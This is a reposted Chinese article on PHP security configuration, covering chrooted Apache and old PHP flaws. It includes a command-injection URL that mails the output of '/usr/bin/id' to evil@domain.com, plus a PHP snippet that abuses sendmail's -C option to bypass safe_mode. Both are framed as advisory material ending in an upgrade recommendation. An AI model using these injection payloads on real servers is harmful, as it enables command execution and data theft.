All articles| All Pictures| All Softwares| All Video| Go home page| Write articles| Upload pictures

Reading number is top 10 articles
VB.NET实现窗体图标最小化到状态栏_.net资料_编程技术
.net发送邮件的一些技巧_.net资料_编程技术
Phalanger-PHP的.NET编译器_php资料_编程技术
PHP+MySQL应用中使用XOR运算加密算法_php资料_编程技术
ASP.NET实现页面间值传递的几种方法_[Asp.Net教程]
SQLServer2005中的XML选项详解(2)_[SQL Server教程]
Asp.net关于Header/title/Meta,tages/Style操作的小技巧_[Asp.Net教程]
PHP实例:精确到每一秒钟的在线人数显示代码_[PHP教程]
ASP.NET技巧:两个截取字符串的实用方法_.net资料_编程技术
PHP实例:PHP汉字验证码的实现_[PHP教程]
Reading number is top 10 pictures
美丽的桂林风光2
The terra-cotta warriors3
2012 national geographic daily picture3
鸡蛋的新玩法
人物写真-谢楠
30 beautiful school beauty4
Sora aoi on twitter4
深圳的风光
网上疯传的一篇小学作文《爸爸也治不了妈妈》
Terrorist smile the largest human history an explosion1
Download software ranking
Eclipse 4.2.2 For Win64
网页特效实例大全
Boxer's Top ten classic battle7
Unix video tutorial6
Boxer Classic video3
天龙八部最新服务端
Tram sex maniac 2 (H) rar bag1
Call Of Duty2
网络管理员第三版
Sora aoi 120 minutes
aaa published in(发表于) 2013/12/21 22:25:37 Edit(编辑)
PHP安全配置之实现安全的两个重点_php资料_编程技术

PHP安全配置之实现安全的两个重点_php资料_编程技术

PHP安全配置之实现安全的两个重点_php资料_编程技术-你的首页-uuhomepage.com
  一、Web服务器安全

  PHP其实不过是Web服务器的一个模块功能,所以首先要保证Web服务器的安全。当然Web服务器要安全又必须是先保证系统安全,这样就扯远了,无穷无尽。PHP可以和各种Web服务器结合,这里也只讨论Apache。非常建议以chroot方式安装启动Apache,这样即使Apache和PHP及其脚本出现漏洞,受影响的也只有这个禁锢的系统,不会危害实际系统。但是使用chroot的Apache后,给应用也会带来一定的麻烦,比如连接mysql时必须用127.0.0.1地址使用tcp连接而不能用localhost实现socket连接,这在效率上会稍微差一点。还有mail函数发送邮件也是个问题,因为php.ini里的:


[mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
sendmail_from = me@localhost.com
  都是针对Win32平台,所以需要在chroot环境下调整好sendmail。

  二、PHP本身问题

  1、远程溢出

  PHP-4.1.2以下的所有版本都存在文件上传远程缓冲区溢出漏洞,而且攻击程序已经广泛流传,成功率非常高.

  2、远程拒绝服务

  PHP-4.2.0和PHP-4.2.1存在PHP multipart/form-data POST请求处理远程漏洞,虽然不能获得本地用户权限,但是也能造成拒绝服务。

  3、safe_mode绕过漏洞

  还有PHP-4.2.2以下到PHP-4.0.5版本都存在PHP mail函数绕过safe_mode限制执行命令漏洞,4.0.5版本开始mail函数增加了第五个参数,由于设计者考虑不周可以突破safe_mode的限制执行命令。其中4.0.5版本突破非常简单,只需用分号隔开后面加shell命令就可以了,比如存在PHP脚本evil.php:

  执行如下的URL:

http://foo.com/evil.php?bar=;/usr/bin/id mail evil@domain.com

  这将id执行的结果发送给evil@domain.com。

  对于4.0.6至4.2.2的PHP突破safe_mode限制其实是利用了sendmail的-C参数,所以系统必须是使用sendmail。如下的代码能够突破safe_mode限制执行命令:

  #注意,下面这两个必须是不存在的,或者它们的属主和本脚本的属主是一样:


$script=/tmp/script123;
$cf=/tmp/cf123;
$fd = fopen($cf, w);
fwrite($fd, OQ/tmp
Sparse=0
R$* . chr(9) . $#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script);
fclose($fd);
$fd = fopen($script, w);
fwrite($fd, rm -f $script $cf; );
fwrite($fd, $cmd);
fclose($fd);
mail(nobody, , , , -C$cf);
?>
  还是使用以上有问题版本PHP的用户一定要及时升级到最新版本,这样才能消除基本的安全问题。




添加到del.icio.us 添加到新浪ViVi 添加到百度搜藏 添加到POCO网摘 添加到天天网摘365Key 添加到和讯网摘 添加到天极网摘 添加到黑米书签 添加到QQ书签 添加到雅虎收藏 添加到奇客发现 diigo it 添加到饭否 添加到飞豆订阅 添加到抓虾收藏 添加到鲜果订阅 digg it 貼到funP 添加到有道阅读 Live Favorites 添加到Newsvine 打印本页 用Email发送本页 在Facebook上分享


Disclaimer Privacy Policy About us Site Map

If you have any requirements, please contact webmaster。(如果有什么要求,请联系站长)
Copyright ©2011-
uuhomepage.com, Inc. All rights reserved.